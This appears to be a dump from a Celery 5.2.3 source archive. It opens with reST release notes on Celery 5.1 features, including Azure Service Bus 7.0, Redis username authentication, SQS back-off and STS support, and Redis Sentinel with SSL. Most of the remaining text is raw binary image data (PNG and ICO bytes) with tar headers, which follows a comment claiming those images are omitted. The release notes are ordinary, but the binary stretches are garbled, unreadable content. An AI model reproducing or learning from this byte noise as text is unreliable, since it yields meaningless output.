If you were using `from celery.task import Task` you should use `from celery import Task` instead.

If you were using the `celery.task` decorator you should use `celery.shared_task` instead.

`azure-servicebus` 7.0.0 is now required
----------------------------------------

Given the SDK changes between 0.50.0 and 7.0.0, Kombu deprecates support for older `azure-servicebus` versions.
.. _v510-news:

News
====

Support for Azure Service Bus 7.0.0
-----------------------------------

With Kombu v5.1.0 we now support Azure Service Bus. Azure has completely changed the Azure ServiceBus SDK between 0.50.0 and 7.0.0. `azure-servicebus >= 7.0.0` is now required for Kombu `5.1.0`.

Add support for SQLAlchemy 1.4
------------------------------

Following the changes in SQLAlchemy 1.4, the declarative base is no longer an extension. Importing it from sqlalchemy.ext.declarative is deprecated and will be removed in SQLAlchemy 2.0.

Support for Redis username authentication
-----------------------------------------

Previously, the username in the URI was ignored. Starting from Redis>=6.0, that is no longer the case, since ACL support has landed.

Please refer to the :ref:`documentation <_conf-redis-result-backend>` for details.

SQS transport - support back off policy
----------------------------------------

SQS now supports managed visibility timeout. This lets us implement a back off policy (for instance, an exponential policy), which means that the time between task failures will dynamically change based on the number of retries.

Documentation: :doc:`reference/kombu.transport.SQS.rst`

Duplicate successful tasks
---------------------------

The trace function fetches the metadata from the backend each time it receives a task and compares its state. If the state is SUCCESS, we log and bail instead of executing the task.

The task is acknowledged and everything proceeds normally.

Documentation: :setting:`worker_deduplicate_successful_tasks`

Terminate tasks with late acknowledgment on connection loss
-----------------------------------------------------------

Tasks with late acknowledgement kept running after a restart even though the connection was lost and they could not be acknowledged anymore. These tasks will now be terminated.

Documentation: :setting:`worker_cancel_long_running_tasks_on_connection_loss`

`task.apply_async(ignore_result=True)` now avoids persisting the result
-------------------------------------------------------------------------

`task.apply_async` now supports passing `ignore_result`, which acts the same as using ``@app.task(ignore_result=True)``.

Use a thread-safe implementation of `cached_property`
-------------------------------------------------------

`cached_property` is heavily used in Celery, but it was causing issues in multi-threaded code since it is not thread-safe. Celery now uses a thread-safe implementation of `cached_property`.

Tasks can now have required kwargs in any order
------------------------------------------------

Tasks can now be defined like this:

.. code-block:: python

    from celery import shared_task

    @shared_task
    def my_func(*, name='default', age, city='Kyiv'):
        pass

SQS - support STS authentication with AWS
------------------------------------------

The STS token requires a refresh after a certain period of time. After `sts_token_timeout` is reached, a new token will be created.

Documentation: :doc:`getting-started/backends-and-brokers/sqs.rst`

Support Redis `health_check_interval`
-------------------------------------

`health_check_interval` can be configured and will be passed to `redis-py`.

Documentation: :setting:`redis_backend_health_check_interval`

Update default pickle protocol version to 4
--------------------------------------------

The pickle protocol version was updated to allow Celery to serialize larger strings among other benefits.
See: https://docs.python.org/3.9/library/pickle.html#data-stream-format

Support Redis Sentinel with SSL
-------------------------------

See documentation for more info: :doc:`getting-started/backends-and-brokers/redis.rst`
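A minimal configuration sketch, assuming a typical Sentinel deployment; the host names, master name and certificate paths are placeholders, and the exact SSL option keys should be checked against the configuration reference:

.. code-block:: python

    import ssl

    # Result backend pointing at two hypothetical Sentinel nodes.
    result_backend = 'sentinel://sentinel1:26379;sentinel://sentinel2:26379/0'

    result_backend_transport_options = {
        'master_name': 'mymaster',  # placeholder master name
    }

    # SSL options for the Redis result backend connection.
    redis_backend_use_ssl = {
        'ssl_cert_reqs': ssl.CERT_REQUIRED,
        'ssl_ca_certs': '/etc/ssl/certs/ca.pem',
        'ssl_certfile': '/etc/ssl/certs/client.crt',
        'ssl_keyfile': '/etc/ssl/private/client.key',
    }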
.. Binary image assets from celery-5.2.3/docs/images/ omitted:
   celery-banner-small.png, celery-banner.png, celery_512.png,
   celeryevshotsm.jpg, dashboard.png
ˆT@Ha*>D dUEڙL:_KR (>R;p8*P -L*h0R663#${VF9ij|%jJRA@;Mol.2VZ)[nm8IIIX~ZL1^Yp^^\NՐAP@"akvfiضNQqQUVc(mH@G-Z纔pjeHњeIj;!x9;sI'q9&n7stƑ;vۜngf[/(wv9w r|8O>޼LċB[5!K(p^ie" F"+햖ڥ:s;{F*EȌ8t-’OI~ƝUXkR-%-\;zȗHnu,!K= z⽵a5w]ȖuR@IPFv0H 7!@9TRA5q3v::i4:vn8p([*jt H݄h:^r;uZmZhG<^~'i8\GS.g*a~Į;<5v8^\U(yx|2(@HBQY  ;#D9Rq# @c)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP)JP*'P0Sn)ez`vQR`;pM25![2>MٷViPfNeI.Ǒ{?TUt)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@)@OV?X'Pۼ\om󎛄{iQ!>eLG'.?O[^_ӱo@QxH R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R ߘPspa*NMMT}h踶m[TFr>{iT#tDG 'o1uqZ[ġjB#ܠ q]RJZ^ۍ^.PS*{j{]Y:bYP?4?ˠ'?gtjUcy{~jgu{ogtjUdic?M|/h5_=FyӠR?,Kݟo.+*omYU7?Ľ,Ԫ|jz.J1,~iA%'?gtjUgy{qUgtZUdi`M򼽁?5_3 =*Ľ{?ˠ?M 5*򼽠|N,Kݟo.J//T<yxgtjUk{Mm.|/jWsAfVNqT<{,ԪUgt:bY l.J1/q?4?˧]Z:bQ l.LKomYiU ]}:b^~i齟YU%ʛ?gt^^>jz.J|/v~iT?ˠR?+GW??u{M1YiUC?g://NJ/v~i7|/i5_=FAfVNH*om{]X^^ŸQף%7?,'?guy{v 5*tĽ{?ˠ'?gtjUgy{@93|/p?4v,ԭ+L' E,:Tn*)+  ݠRRRRTNL%&:'4YޥW㨳еRp9'L6Ckh1Swm*)Ӛ>#0o)-y&HAX5*THbܘ#R n@ XG=zF".@nim(.$vޤ5-%rBFաb*P JdTl64ZK@ہeIʐT3G$o,+Hv1:У;pNU Tv\jDun#ż -Gk6K!ɒuM Zp3}+t & q.7sB%41!1Ǘ#ZnJZVfLIIiS4SJJO<8'׎?>Z G^Cڂqx$iQt3)xL'N-SAa.rSjܒnVFޏ֌ޭ\䈽[#$6oN3[]q-48BTɪI3eXWKJ&.kS*~$vՆKiz;8HC)Q`Rmlvq܌d(aN[aܡK9!G?OOjCReO"͜1xpbl0AIl,$$,w$}+F.ͺ$7&MR[F2;R2=j uo{ 8AjMݹ=v6! RRki #Ьފt=:e)I܆׼%EIRIO?>*,$Є)2#Ppy [Z(Pa¶ױXܒ@8s cڌ`q-i($7!$9XjdL8*a:H.ܐ  @4_YiNSyq.s@L}fЉwyeE.ra'm(^J )e VCR6dPRNR@1 y zaFqE qneͣ*QR@$)xᣆNۊyk5+7|$[)S**^#'GJ %F)+P+N3'\4$4Jy pA=· qL %ȭHA%%'jGjן~b5^Cmhw/c|ۦ--Aq Z F2zFi7W/-^%#6[ y']h!zM L[\ АCjJ$$fPܟ9@-p8=sB9EGԓ5)0^'O2͛8ʁ>zZj"-- [%ih[eAR=@8H-r:d;ڈuLt% qm o*Or;}ԯ4;*ow(8۶q$ɐٳ_y I0rxכju=͚F-<'w!FiHH+$ O`Yn"ZL!%TRBF3ʏ''D`j,xq)(bC-KJJPTN̝Ek3L?KRwv9ꇣ0j SJQIޓ9ER_]S˝E9 Op1qBH5!]K$$1x-i*eI@@KN[XOX{O+r N{}SWHaGeM\鬬(/$+GvHD5@A}R#竵A![IAaj*\VַZڔ6ZpC5别ZK$!A );HNIQ/j$!}1&56ګj"aSBҥ'b՜獹jfQmjP7/rrF sONP)JP)JP)JP)JP)JP)JP)JP*R͑ 6{ XsrLNĔۄIӜӨ?,bm.}cfͿֺsOyʏt@JL226/].97ی}BVyYRRZ"RﴏQkzkYT6Qpˍu}xۃ޺^_-A)P$LCϢ>ZRw&~b&ݱ6nkj}=PH6)j워 K6 5d͂H}+YjmbwxRF61+CW6suWMzӓܘNJs}Xa-!.%3]WMP)R瓟J%U Օ͹e422C-ܫڧPN>_ *R%⽈INДI$vўځ5[MmFR[dˤ*`0{_mNʷip>1.B }8*7reό$H[MF=sQ;iSEO:iC 9Dc5dqeI&[/02#qe<?2hb,mkgRʸ<GJLPLLBЧw2 8 `bY7ub2 M^尥?VG|q2kV&|TriCA`#q)OVA^%D]v9azTӣ#V@pMa2Ȏڈ8@*bJe,&6 S\A]jo2;ʓ܌3Hy=;ʣnb*b:@^E*$Ÿr8XZq1nmLEI#sJ~ԨɐӾ%%)vZ6S.^L7Z]&Ӫ/c}*L+KVnֹLwԨNԂHKA`Ēݹ5-m? -%7$AC<.8Jq~?u4kTȐS7z.@'nƥ \!JtLlKi$s`ԂZ if^߹ۥˮ0a)N8O[ZZʫ$IM!II!)q$NU;3Ԙl,#Gldg8>3]JBt8T܏WoZ['ns <-7 lI-5ml߽ Rvߞ/rjWtZd q0ޱE3H1a=I RRS0<⮒қK'j}3JSfe,i'\wݐڒCjR@@Ԣ8YV{vo濨ako_0)퀍RRI$e$5N掵MJZ EGR:T} "bѭC[]ꂷ#;>[.vfKY,n7-e eCw\7^׋K--c%HRR€XRrA=iDŽˮ[U:)i' $x}h^@d?ٮ9pᴣ(Bg>pj.hƆ{{P aC(䔄Ur-9к8䌰kyJNy r95yjoؾܐp~5[ҷ{˷96F !_L !jY9ڞ ֦3)lׄT}%Y A[gh1NO5ޏKWљ.\ ېʐ*Nw={+up[3*F |$Gvℷ]Z]V[ߐ |1̞Jz E,J}T+ JTgo8TGjҋ( r [z$!˪+mSp1ߌvM]r" VA!m)äل(V-q)Y)*9zaTZ@ޘ_m-}xfvS& kS:zAOܼs18Xzk\B؄ܳ-u¤2eaKv%=QWT/o].co q[@{SM"ZeŎ렫=i*b2u>fjm(p} ӓ4\iUh+P٥:ڷ|'->esn7 lqLL[m4BА̞{S41U2mCzXua)i! Oy*F<Ż*;*`(|)YT%/ˎh7Tj:e܈pK8c6ږT^n^x#1Z Mi2KdrBid,grڕJf|RDB40.+=Nz{TeZNfIً7 R>Vr}HF.Vv%La1/pZr2 38)j@\o:(` 9RG`qIOҫ6YSK(}Ģ8gn? Ur֔iTc2Qҙ+\=;;5Y/nBz1jJKFక°F(pR{pZHaխ.s)g 9gRRRRRRRRRRRRRRTNۃKm= HV$KUwY '+fbm*;: cu$;GEQW+81[_ezX\,,w%$`"gDiA>Vp-8{C=kUvkjutu +i>PN3;TW:v| iO^sK6^i23m.Rf_) aRADvXDal2(vRF0T1:|+K$꠱8kBP }GZ-$GOVJdKpIy1ߑҟU}:'O ߴ'$)m.TH﩯e֒#Z4 sϿ+HqǶ +QQ]ڢƉWꯟ$i| ꠱, QAܒFvc#mĎH7[3@ʁ+YwPh> " {ꠛLhC㡤rqF-㰆P05>W2꯿$qꠞLH&3 lvOSn.6HZr|gW'U|#O +?iw5P!1هPZZCIJ! c95pb91:a/>GsP$ۼ F|AH& ;~:|(U-ېKKI XG| ?]TXiz.Ȥ;qی OPJ:p>y4N ꠚAQחN]8μUDCoPgWN0֡HB| 1]_~IWc%A2m "ZCH%;gUtIwS?C9_£:hP)- QYaYlw6(>`Oj:#O~¾9NO^qU2V x7Wv3|r7924$c=TiO^sK:|LUi Ci JGY*4N ''e_>GvA4ն LPbė[C) p@ [xUl>H>y. 
''eA(ѫf7R 'iG޽ =E1EHQgãa#یf>G| ?]U>H>y. t0b9zDvǗVVƉ hO^1K,:v| 4F|AdVHH+K$+1꠲R$i(x?tF8|r?iwPY)UtIwWϑҟ}PYiUt +. ‰+YwPY)UŸU}:'O^G˿J''e_>G6AeVΉ@4Ny=iwPY)UП c}?Wߒt| ,|g_>H@+?iw5['Oρ^qU>H#,||r?iwS?>y?]TJUk?9_>HAdVI+%_>GJ| ]TZ/ƎwmqY'jh^Go]U.F̖`+6<ⶨv8*#40M]]iJ)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J)J././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/dashboard.png0000664000175000017500000025545700000000000017551 0ustar00asifasif00000000000000PNG  IHDRD{ pHYs  IDATxy`n/pKoD.QUQUj~KmmKU{`VVVZ)Zz"77r!Mvw~nXH[$s|={33i<7MӼ0ai\Vk|_kZ_Xp8^ix<|iں+ry͵6֬Ֆ?_W念)ʿ+i;l:6n}i},d18Z_kZ_d0nV7P1rF=Yώ{<")oyʿWO-OW[sfm3Vm=bm=p6 Án7YQSSc6xwi8ۚ嵶xul|D.r+ʿ+G?DR_oWWW_CRRR9sڰ5tk+UhXg"wΠֿgt"}o\ǖ?:+ʿ+ʿ+O?4uJߺC|"4"G 9}_" ^揶ÂgbeȤ6^6g=GO6V_W_W_W_WWGNdzvZ\.W6֍ >Zـ=Z"7PGvyh.D.?ZѺ{Dkͭ5^k]: mi}bdL]XR_W_W_?_SSCjjj27ĉINN欳wi*3x @`6@`;nDnȍ![:α?ȑ#<ۦ"ToHHH ;;Zޱo-峥㷎ʿ+ʿNW IMMUVQWWG߾}2dv4x<<#Gd5WG F-Iy"hg;F<j.Fp澬uW_WtRRVbС]t233پ}; ]Ͷ.#!!+**֞ PWWGII TWWFNN]t!%%3 ˫Q%993,i.] `֒X zlڴzd{kMȑ#ڵAЦ36@o` xkmho]uXsm=ï+ʿ+ʿߞͥNrrr;wZ@{n<999J)--O>b3rzMN>}VK roڴ={00Y%001bQkD3abbD5z sh +Q uΝ|ڵ:>h&Di38zh[G#lcնbmM~_W_W;rCW].L8M7h<Ld_SSömHHH`z<jkkٺu+ ߟfֶnc}YEo?U/6XbЏZ +oYȇkDcmKW_W忣ҥt=ׯmʿ#rGVuɡC0M޽{t:zxaχ -jvos׾9 b@!3C0 |f@3L0Qo,E/%^3Ba?w:ɡ& tBbbbCe4 effS-|}9ZG;(G+>u\sG#ψY?2;G~9z5ʿ+ʿ+ǚ#GzÆ\.~m.3Zʿ#r%#L 5,X#ϐIJJJۑhk{΂XWXڋֳܸv(4W 4_3@aEno+ / |Glܸtv_( lDbi+ 30W'};Z0MK W#Xܮ?-7mt҅M6ѵkװl3p8b~HHH 111t-555괱ϑ_v#ESdz8192+;,ˎkag6 %r-_rh?+ʿ+ʿ6^{mm+i_e} zal8PL`v;ّhX;pp9mm/:G&(=$'',M0E50w?~kY1M5fe`&M'pUg?_3F]OF T>dggr!11hhD:uDeeeɵhD~o=&F;Hg:ּ_cX{}i3‘_v-#`]httwk=+ʿ+ʿߖ/o nMHdP3ׇ^s;&E&E~ |>_KJJ k\pCz^JJJ֭[x z `̘1K|l6ә9s&C +1[~csS\Zr(|oR3gԘʼn o1A/[LL3`}<%[qߺ#sjWS__>|8N͆ 1bDX7okin |%%% X|zD t:lTVVy4Ͱd#y78>+Vdn_ֱ΄Fovh GY-h_ޑ6>4U_W_o;g)f#--2Bl,+tYYY ݑg;Dzzzڋ06Ǘڎvڅ u 7 d;Z9h_"hVVEEEܭ_mG;i|g#ѾxGюllLsY=" <~}_W_WOvmђmڵ+ ݎfZvZxpҥK 'Z%.]49`Mui>|&/1Eȱ& ,ZKFvJgptb3f31'Fڄ;p> W!is`ʝ3ȢEƯi3coC` `0[LR22ik3}f-? RSHMKcϳ, ~*LLAf. >fc6M| ig?&΢W'--הxWd>3/- 8Oq`kG6t75j$nKܸMzz:#GAFFG 9ag"ϞFlP>/tB-xƓl|DNcuǑ_FYzCm=FҲnXG;G=Gn_W_Wȿ-^A|>IIIٓbvEEECyy9v^z`[(IIIՋÇl kM:ۋ/r:T^^N]d@xZ[v _+>Ӭ睟 fn)vs+0໿¹٬-'bkjؽ\@1˾eR0M$8W EY`=7/ys<\pso׿,|}- d ƗZs2~,xq% 7p\~e USx~G@?pe_n3co 3F` X_(/wv`Gɂ et?nhDұ~iD~AD+u\3_f_=G~XE[ǖ9:?r*ʿ+ʿ;"Eidee¡Cؾ};ՀۜLBBBْȮ 3338p aILLl`7 f4h aqXۉ|puyד?#,M>k`M,Okӳw3궼oEi/'3Xcͯ-K*ėk<}~_[4}uDpԹL P ˲k`1t{Lf 79q{{{JH6C O/es;w9Ev|R^l2GYoL ,KáoɕIxC+f#?Q&F%;+ihh 111Nbb"zBwG$j&4,ך6_\Fnh]4hְa=+ޚٖu[go+r[Xu.'="buAv>EW_Wd)DȆ%p8۷/ay^hhhh#7H0gT9GCCƈ-8p8ӧ K磾>Z/ LYŏI1SgYwܸ b~\3%:,e"ڨ7ux7L$0TKI?OӺXswPQx @5 tf)L} +gqh:j.7x5{t\)&mf_['̨Q~1rgQ__z VYY|1gugIplJKK Bee%Q-v ~΃W1`d:[wI;#F0W.@e19GY?L:NB4M'g]t#_W21*zGo2i2`5<ۭ:ySIq/"#F0bH/M4M1s-rہ|7իWSTTzѣzjժzRUUdOMM.y _"|Xnw\pxX>zd,YD[ۉ6od_2N>nhol}1hYle֦m[p ٱ3f ^cǒLLªU3fL x=dffx#)))sjo0v\6\Fk?G["6\*1к mu>k;v<掩-m疾C'і+ʿ+ʿo:tȌLdpe"c+I~@ѮF[aXa:IIcD3?ɀнFc1i`nd' 7Idn nso~#/3D_W_W&*rYmG Nc=}o@bpM#ߓmGQQQC]O5F/P4g}G2c a֭|Gu?3PPAjf'R󑘚38?dæ9YhF;hǾh_:a_9v3e+ʿ+ʿ Z3sEuY sD.zrđgY G^߿?D'rEl3Эzeߵ7b–d [` 4'%ůOh6FRr۷oG_31@3Do]FqG~FfF/斾uW_W_?CnmbfFNg=35 q֛#7Ts1G&r݃9r* Jݎ3O6u1l 3'*#ІzL_eYK:mYU(^ů!D˗7Ln:?h_TGsd}0uXv5K&ڗYkbݲ"ʿ+ʿ+m˿a7g;VQv` -Y"wDEp9>˕}Eqm#ڸ3/*l|2hs[ENg/k_W_W=a`,Y$тnȳֳ)7 r8amZXi"W0Y6LzO~~>aPUUM)ɡz"E+#aϖ7^v10Qc+FhHA#X``fઢa+lů/t<ٳա>͝vki|0Xݒ5E;¾p#۳k];S{_W_W%ib\.3Ngz<n7a6hyZB2[:TE!W,~Ӊ"""""Uf&Fæ”xp? 
[binary image data omitted: remainder of a PNG file under celery-5.2.3/docs/images/]
celery-5.2.3/docs/images/favicon.ico  [binary ICO icon data omitted]
celery-5.2.3/docs/images/monitor.png  [binary PNG screenshot data omitted]
celery-5.2.3/docs/images/result_graph.png  [binary PNG image data omitted]
`Uo8=jj6gSt]}b_/'~?2B{:;ݢ9=!GlK2[?>>&%    @;\Vfh7ӌaPF etQS+XhͰp0+qک5f:YIC#.C_~/E_~/EuCQɜjH#x ׎iX L`tE` ,8!n(WE_~/E_~IhՆFHd'@{^oH}>W5 G_~/E_ V+Doz"k p/:jpTfo; A;U JˠЯ:c$&&";   nIL{K lkJ飱-  0())aadgg3ao+C=Jaa!l6|>}7nJRRbT=p̀iZp}=,h9=iix^Vk@z~دY#9G_d_AA#S\\¤I8q"~)>S=Nַ8p?ihh 55Z{]n& ,M0 @GG7 Cm.`c>Z /K^^wy<7> wHff&^ }Q|u,N0%54_ª݆9i%nn77>/UGIi --ڼٹږ@-Zzq^_Jj?YJl /7XA  `2Ə@N(..qnȐ!C[uIff&WFF[maDcDmD`ٲx&>>ŋIHCNanlyƜ&ԥlvN ⨯nF/I||sH1fѝ2wx!.]3^p˃H̱ps 7qBO!m.cSbX8~?V/ +@xUM݆%| l>}   V>lق AƏOVVV9sxyz|~ +[obDk:G?\!555\y$%%villt#ޒ/&筷";;$v;/&11 @ഄbyX,dɦanS__O\\.wFuu5eeedddpg2iDB}>O<{!%%X{%IL7HvE͆׸<WW4o}/>y/޻-Ï?iP3y֝l=O»X#̻V^]{8[GO &v[xbX|'/y: iޣ.>+Jəsx9?y^_bS#s.yüWPM-f~aQb¥wq.q鳬Ҧr}3?f'v_aϳ?ϥ}sX4YS dٖ3ZkJewy$[+CM ?=,bYsY> ?|p'+.d|2\" 39 8wr!֞7iêFaqٗ(6-~#g{o&o?/w½H_3׎xYyJ|ϒsuܻO  G!.?QgpA{|XngJv.N`ˏ'U̼\17k#q5UиcO(dѝw2[X7.߯na4?ɮ}߀|WM\--d̽)@y95wߧy|[o=ͧom?ލߝslk,x|{\zbL[ l_&=ιiH3zC=d? 5SowwNJ9/Qz`?̢@}1o<{j<#-.86K=L11]̒Ops_Xt_g7Ŋ/qs1-+   !tMڵE 9ݡ:˗/OpSPP)9 HorR^{-K.%11MӰlˁ=7S& ,zhz&];g n_||%sl6fXp#w D/yn7˷-~w"`+4[S 6m^CS^]f0y4͚ϭ;g+hyl] 93Ɏ^χH807c3v&$- u]6>L6gcsqg mf iS+  p2~8?u'8p@ᛚߟf׮]sݜyM? /k%>>>4x4Deˏmg5<Axg0dHӟb 6lX̼NuU/C)996a#5/GMuuux> jP3|H=᡹bٚ53&Gд/2;woc1qPW=Ɍ~z2`( dO^lF{֝4f%.Cw\tӥlVNn5p߂)Е>i]<Yt`du:1'౶ѹ !?64ᆘfg;wi  #2]n^zeۍ㦩Ç]IMMŢiS?B!iiiaذa2?m,[jlڥ~C}(~d7ϬsLv„+|Y k9{.s@uA_X{|)|N^pUO?_?pX{zc'LINPgPӂY)6)-͍]Ê;q/ [ՔRQ߆7y Κ7SZZ吝b+,FymFJ)dڨ#/M? 1koobyFz>Gx@LrF86ctO;+pk:]  u봶1~#n0ÇAzz:n38ۍf#%%!Cꫯ'ڔe ﲯeҤI|+_ncC]kuZ9֔Z e= Ng`jC7 x!緿-+ڵsΙC,jkXz5[n%g|y+F3f[M_4?8~<-\9f<@EO|M|70,zO  W)_`?ȠRJKK),,dx7p%ϊ+{fԨQP=dq*++1 [nQF7 m˖-fY^C]b7ٵ΂ s %~尹O@8u gK0k!~N\G׃ Q߷ ]Э/   xxgx}Y̙3ާ;3w߿8}j )))TVV m͆E3730p`S>MuZu"0G"+ǔu 5 ԈkuZp} OdsHKK;XAAA8Qx^>\aÇkXz/-b/zBB i4?2+BCSCFDTn._!   n***)t:{"ĘjF!‘GWZxc?%`M s} 7_In6ˋ|m^xc?33۷PXXڻ@AAAx^*++ٴi3Æ' W۴i6b\Ko0 D_b Gy&".%op7 J</~/EД >E_86k`J~fV&v}7 =0&(J"މ5F8YeM|893S 4\FС`" "FNN. 'Ox͚q?Z&jQ~#U3q)%@G_~/E_~/E?tttHÈXP'5 Y̥!1oz",~#{jA1o( J#&ۿ6С"5Q?SD0ԻlHbh(y_~/E_~>a7bÿ`/ *Lu|#PZ0L@%lkPT@dM8ᰠv~/E_~/Ekچ 50h  )NrBJz_~/E_~70 C 38 C0:'^k(i76T{-Q~/E_~/E+W_}U9/   ')a`;TA/%-AAABbAC,iSAAaj/ЇX-   !#8 }E_AA8,2/ЧXd_AA@!A/  $d?Al'  $d?A「   O8   'b 9$k.pܐi  @OO:\Ǥaĩ-WDYot}OOɅŗ?$.BجT<~>t pZ|g:S~Z=5S Pʩ r0|Wʉ':'VZtIr][exTyHOaC7045;lGӱ4gAQ9;muČp2|^$fhu  Bsμ$SEX"5n6gqWxg'YH |ʛs!Zѵn;.-nۿ Iu$Cu]>GK^~/5⭒Mg0d,yi= m㣕P9pcyI3Ia @bհYiZ’{)m"gMC?ҥj{#=ΜL]Û7U8B*+_ޯvEk܌Hx? n>r,~,l6lZ5udfT>gqv|1JGMz6y]379;:K{t  ')xÿ jXKX{+rBSh.7xeQ̪U`CCjGq_]t7OV0.l6~S?KG¼Iŭ'S!k!9#"v;km,vv%];mfru1Է#J>ƹyٔz6npmWMvǧ'=Լ>zG7籺x3MГfr֘1$Q]F"ǞФ-IaH&=5$ =T V'6Wr7 (LrrFd$O)ޡ4ƞ9lhMƣJ"!um.3:U]2 k(bop ~tOy yW1}4Z뷲Y39mH.&?@x~C%> ~- 3Hڼ5yZ8\;xiXqJý~XPǁƏΰx^!I 9^Mah:XGłXLs[ Thn75iP~B/g A6%[=^+Dr#*i;\TWK'#'g\;kx_q5áx zCfikѪ)дl-[``MNvtuPy9q9tERj 5/‚3_XQ#ǁUǞm]ơ*Lس I:i, u 3y5\]%UwQ-PLK[iCHMukANd⢩I ޶P]령Cv dćtG갏E[e3nBU|eXXBljjJYniL;^~~w1+7.= k;v/_Ys+ӋggaN+*`DT>k}YfR1ia'sla/=c*Uè fWe-Eu+Ɍ*qp/I vU¢1n߹!%oGvg<Y-cm2Ƌ_@K߹8v+1^qv|X٦?$!9-q`sק6,&omx|^U2V9c;ٲnGXA 8M|-EC%\yՅdgy~v.#Wujku ~5+vs2}|ʂ%7/;}7r|k3/=X{&h- !xek^gĥ_a)PZEݶ=Ӆdl_9clF !!LX tnu&321f]'. 
_R|/yhVcw״밹dXwoLxMAas\6z5b2ҁ`Eĵ>{E5!\8bfME+V=+h>m)C0ܲc 81۩YBz,c`D8KvVOVO༂,N،$nۆ =|"qmh$+=Q ٹ GQVpIu1OA=[VB;5.&S;XsG5ǟr/Śy6SbC$Ma\hDi\|T?7|e*_?ǟr5yUZ6j҇_Ƥ&G|isc9d q ߦ_?D7gΜLsr:D˘v"GمΘ ]Gެ@mzRfSZH~:Rm׮Ǚ5s 8X-q .'I۳)km\)ΘC6ךM58o5u9Da78Oӡm'ծN]ДAt즲dFZJ2wQ/[n9֜1K;6gr[CMi.d9|{XA)Gp?W~GEo&k: v V7Ĥx]nGMme[- pj5f\6#_%,=)%<i)`D®chNpeKE[Xo5eVfSGP~ ʤwcU:j,Mԝ]SYw|ɜKILJҸ2eLOQƎ,Fn&ΝXCtSZ>o;0)4Y6lZf#[Ph]IOcsQÊed[;PY ܴ]cݤ8zџB宧xmZ4ࠞ";ۿŨ1"3d3fvH7غg }tXz@Q:L][^\G/L: &/s4t1A({7ulm6 ga$M<5m,eT9b6VQyU9(,+_ `' )gH(6eE)-$O#y72tCGos3an|~SŁ;vzCйl{ʉcٰʪRsh`l5KK3ʼNn;}SGd7_ӂ3m_g2lk?exOAAAa͢ȿ9}ȐIXv>pMuUњ5}&3һ)hRz~Q|9ar5șPxkkf34s*MtEvNMZ)ӁX5 V*FatvGA"wK&1,s2ڇ$N 9\]ɤQ? 8: ٌȟ Po͂8{?t"[{f vӡSs#тr*'zDج^; juu*ު9ÈYLgt:$|gNIkiZ-AVC w`V#r˟BDjVk=M R3s*VTY5Ge}2+8c[kbZHLpViȌzHNfYz m̸Pwd"+e'{y~ICRi ;h,'`,>ov41twO۷JsMi{k?9Kii9_ 0`|tS7X8g|8'T~@CrN|@/z3t.q0,(Sfz`CրoxyEkmn31:/z#3.~Yyylh:vy@Ysliji?H$nH&˒6_vME PguGxioc q=>13%,Ո  'uW29%3futpg @UN ] Ma39G(rɧ_GЫzuUbU#FIfo;*ۏ0C30rMPMޫYorΟ@7ԏ5 'i hH| Ra@+*KhWpN FG787?xjv\m!]eeLM2k6:tx ggś+>>R.ϝ$ @껋vʪd_#:s1_.{n朜s[xc2yΝ]fg!C g2&y_M?Fs%*VTR:LdS]@ٶjθ?(ڱ`jppG {4yAA8 v`ܙ IνkiyEd,2eu;3ԂY. ï(h/Ƨ[,uT_M[T#n^ǯY?-Jw&&M!5b'ᰙ3gXFuAWWMA0Fe l D3(c_Of7Y).ktUn5v8]m^,˓[4k }++> =^fj~N Vo+6K˸ಯ'/|:[o?WZ>ٴYl 3o`ڂT\_&PO3BQ~ s21pg2|Ul] ]h'uS_a؉ʛfd͌Mi :j_e#Cfpyd%izq`f30(Jih`H N&ί:%z|Y c.1c|5*,n7xӌ@}moX';А|g,ƤBS9"F'0@;7}d[L&;&8X CT51,{&W^;~y/qd_ǭ3aZ˟-kC8Xw/$f;NH^?qFG>r)Fzl2>v|n+5y|qPM)S;RK_ࠃ@DZx Ɩ(1J80vZ}}Nhn@]Սm\7'AA0 q >!8,q47L{.z#%=:_[GUXv`/u%˘*A [B#AA>"v\F#pUQRho竢F G{@:xI4o op,#B9   tgÿAsy=A/rGOkΦ  p,<6:p޴7ʚRA iCAA8ur]K8  @0 /ȴAAa ? BX,Ҧ  @ 52_AAHk %VMAAa` A/  $ O AAO8 kAA8 qAAl'p AAUAAAA8I1 mÆ F}}=^   Їv222eee ο    dv\.u5   ЇX,V+놬AAA0-AAA$GAAAA8_AAANrAAAqAAA$GAAAA8_AAANrAAAqAAA$GAAAA8_AAANrAAAqAAA$GAAAA8_AAANrAAA[ ԡ%  q'55%tBAN(o#F^`AK:!_3f A >:aP^^N~~~8fl6NRNuKu4up Ć N_ATIII!!!EV ~7oA8_%0@AS'X,hooo)4 dJ ]!é8Bo8X,~8G #{x[>'ȿ00 P~9k w쥪:SN(;1do 2U` 6rFYޏG'.*Jl)ʣvoc=@,{&=p yTWWT2A tɲۿ008kg7?'7o?PlqCB˥qVmz?1clmr BHM~K<MM -AdH BW/%}+_ăO-aWyPqѣ g қ8™$H9KYFhưGgA8 52/iA Y/%}>TQt O+8Gpw`&J0R^Rdq;+\7uߺ}6`] fp˸K)J94\፼1h<.VxZ҄; `_}L.goi>~Ы|T|ص]xk)[SREE33 fL7__EEȟ̅E1G.opBUU w>u ݽO;2wj-CdH BWȿЗh}0 ܇͜>Xt q>gLOa^6+ۇံ]YkhX(W{{OoQ| 455a,XRN8ʁ<ǎ=2AڇSÇSPP20o߉x|lg+hHMM=!i'1aȿ`6΃GWc? <ϻ\z5,8`#4Mm!/>o'/JxKw3xFq Fqo~,%%k{ Sy_}feKJ"iƯǿO&q?}1VO^/8wX& ۹>~.>?% *3|[Q/a~|-?퇬V>4%W?h5!v*vy|G9 mjOo9 A\ʈs+Wd׮]vm `ٲedee1u{}v\.̝;.x/s%%%ڵ EFFӧO'-- 8֭Lϟh *#!y7|si qI߾GO%ϰr3{)iZbv|3C̞> 7XAݫ2)%7?o⶞ܳЪK~u1`Wi:zAqƲŸpV^“+wf90ZkPp 